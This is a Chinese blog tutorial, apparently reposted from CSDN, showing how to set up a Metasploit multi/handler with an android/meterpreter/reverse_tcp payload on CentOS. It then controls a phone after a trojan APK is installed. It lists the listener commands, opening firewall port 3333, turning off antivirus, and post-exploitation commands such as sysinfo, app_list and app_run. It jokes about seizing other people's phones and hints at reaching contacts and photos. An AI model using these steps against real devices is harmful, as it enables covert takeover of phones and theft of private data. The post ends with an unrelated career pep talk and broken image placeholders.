系统相关
首页 > 系统相关> > Centos Linux下使用Metasploit渗透android,h5移动端面试题

Centos Linux下使用Metasploit渗透android,h5移动端面试题

作者:互联网

木马生成完毕,msfvenom兄弟的工作就基本完工了,接下来就有请msfconsole上场了,没错,就是打开metasploit的控制台,着手配置相关信息,开始渗透了~

直接输入msfconsole

$ msfconsole

长久看多了单调代码的你,下面的图形代码有没有让你灰色的世界多点点色彩~~

谈正事~我们需要配置什么呢?前面生成木马的时候不是设置了ip和端口吗?现在我们也要在控制台上配置ip和端口,做监听来的

要做的流程大概是这些

(在msfconsole模式下)加载exploit模块

msf > use exploit/multi/handler

(exploit模式下)选择之前我们粘贴过一次的攻击载荷:android/meterpreter/reverse_tcp

msf exploit(multi/handler)> set payload android/meterpreter/reverse_tcp

(exploit模式下)查看一下列表有没有多出你设置的载荷

msf exploit(multi/handler)> show options

(exploit模式下)设置黄色框下的LHOST和LPORT,就设置成之前生成木马搞的ip和端口

顺便放行端口,输入命令firewall-cmd --add-port=3333/tcp

firewall-cmd --add-port=3333/tcp # 开放通过tcp访问3333

配置的流程都搞完了,马上就是渗透了。

群灵觉醒,封印解除,出来吧!exploit

输入命令exploit,开始监控,记住不要关掉,就坐等别人的手机安装,然后别人点击的瞬间,俺这里马上获取到别人手机的控制权,到时候,嘿嘿。当然,俺这里是渗透自己的手机(然并软—~)

既然是渗透自己的手机,把生成的木马拿出来下载吧,俺这里是ftp连接linux成功后,找到木马下载安装到自己的手机上(杀毒软件请关掉),我用的是xftp,只要你能把那个木马拿出来下载,管你用什么办法~~

安装好木马后,点击打开的瞬间,没有啥反应。手机上没反应没关系,关键是终端exploit监听有反应,并且开始渗透并成功。

如果终端没有反应,就是防火墙的问题,设置的端口要放行

输个?,查看命令列表

比如查看下手机信息

sysinfo

想打开某个应用,输入app_list查看app列表

然后使用使用app_run命令打开app对应的package名称

手机上的termux就会自己启动

好了,还有关于相册或者通讯录、照相什么的指令就不讲了,你们自己探究探究吧

尾声

开发是需要一定的基础的,我是08年开始进入Android这行的,在这期间经历了Android的鼎盛时期,和所谓的Android”凉了“。中间当然也有着,不可说的心酸,看着身边朋友,同事一个个转前端,换行业,其实当时我的心也有过犹豫,但是我还是坚持下来了,这次的疫情就是一个好的机会,大浪淘沙,优胜劣汰。再等等,说不定下一个黄金浪潮就被你等到了。

)]

[外链图片转存中…(img-GXRcLSxt-1643529288618)]

[外链图片转存中…(img-mDoMnVIl-1643529288618)]

[外链图片转存中…(img-9oV5jQOg-1643529288619)]

本文已被CODING开源项目:《Android学习笔记总结+移动架构视频+大厂面试真题+项目实战源码》收录

标签:Metasploit,面试题,Centos,端口,tcp,exploit,木马,手机,Android
来源: https://blog.csdn.net/m0_66264533/article/details/122753502